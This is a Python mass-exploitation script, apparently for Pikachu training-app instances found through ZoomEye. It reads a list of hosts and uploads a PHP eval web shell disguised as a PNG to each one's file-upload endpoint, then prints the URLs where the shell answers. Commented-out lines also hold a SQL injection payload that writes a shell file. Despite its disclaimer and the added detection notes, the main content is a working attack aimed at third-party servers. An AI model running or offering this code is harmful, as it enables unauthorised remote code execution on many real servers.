python批量get pikachu的shell脚本模板

声明:工具仅用于技术交流,请勿违法

'''EXP : getshell use pikachu'''
import requests 
###############👇
# Location of the address-list file, one host per line (per the original
# comment: the first two pages of ZoomEye results).
path=r'D:\phpstudy_pro\WWW\UPLOAD\py\rouji\pikachu-data.txt'
###############👆
# Placeholder only: `headers` is rebound to a dict a few lines below.
headers=[]
# Commented-out leftovers, not used by this script.
# NOTE(review): the Less-2 paths look like they belong to a different
# (SQL injection) exercise — confirm before relying on them.
# re_getroot=re.compile(r'Password:(.*)</font>')
# class payloads:

        
#         rootdir='vul/unsafeupload/uploads/satori.php'
#         getroot=r'Less-2/?id=-1%20union%20select%201,2,@@datadir--+'
#         writeshell= rf'Less-2/?id=-1%20union select 1,"<?php eval($_REQUSET[1])?>",3 into outfile {rootdir}--+'
# Path, relative to each base URL, that check_shell() requests after the upload.
shelldir='vul/unsafeupload/uploads/satori.php'
# Headers sent with the upload POST only. The PHPSESSID is one fixed value
# replayed to every host in the list, which makes it a stable log artifact.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "Cookie": "PHPSESSID=f7l8c2ev37d3n547bvh2nmgv29",
    "Connection": "close",
}
# Multipart form handed to requests.post(files=...): a file part named
# satori.php whose body is PHP but whose declared Content-Type is image/png,
# plus the form's submit field.
# Detection/mitigation note: the mismatch between the .php filename, the PHP
# body and the image/png type is visible in the request body. An upload
# handler that trusts the client-declared type will accept it; validating
# extension and content server-side and serving uploads from a location where
# scripts are not executed closes that gap.
data = {
    "uploadfile": ("satori.php", "<?php\neval($_POST[\"pass\"]);\n", "image/png"),
    "submit": (None, "开始上传"),
}
# Normalised base URLs, filled from the file at `path`.
address_list=[]
#初始化输入的地址函数👇
def addstr(url):
    def add_http_header(url):
        if not url.startswith('http://'):
            url = 'http://' + url
        return url
    def addxiegang(url):
        if not url.endswith('/'):
            url =url+'/'
        return url
    return addxiegang(add_http_header(url))

#读取地址列表👇
# Read the address list: strip newline characters from each line, normalise
# it with addstr() and collect the result in address_list.
with open(path, 'r', encoding='utf-8') as file:
    address_list.extend(addstr(line.replace("\n", "")) for line in file)
#print(address_list)

#上传webshell函数
def upload_shell(address_list):
    """POST the module-level multipart form `data` to every address.

    For each base URL the request goes to
    `<address>vul/unsafeupload/servercheck.php` with the module-level
    `headers`. Nothing is returned and the response is never inspected.

    Detection note: on the receiving side this is a multipart POST to
    vul/unsafeupload/servercheck.php carrying a file part named satori.php
    with a declared type of image/png, sent with the fixed PHPSESSID cookie
    from `headers`.
    """
    for address in address_list:
        url=address+'vul/unsafeupload/servercheck.php'
        try:
            # No timeout argument is passed to requests.post.
            response = requests.post(url, headers=headers, files=data)
        except:
            # Bare except: every exception raised by the request is discarded
            # without logging.
            pass
# Executed at module level, once for the whole address list.
upload_shell(address_list)

#检验webshell函数
def check_shell(address_list):
    """GET `<address>` + `shelldir` for every address and print the URLs that answer 200.

    Only the HTTP status code is examined; nothing is returned.

    Detection note: this request is sent without the custom `headers`, so it
    carries the requests library's default User-Agent and no cookie. In access
    logs it appears as a GET for vul/unsafeupload/uploads/satori.php following
    the upload POST from the same client.
    """
    for address in address_list:
        url=address+shelldir
        try:
            response=requests.get(url)
            status_code=response.status_code
            if status_code==200:
                print(url)
        except:
            # Bare except: request errors are discarded without logging.
            pass
        
# Executed at module level, after the upload pass has finished.
check_shell(address_list)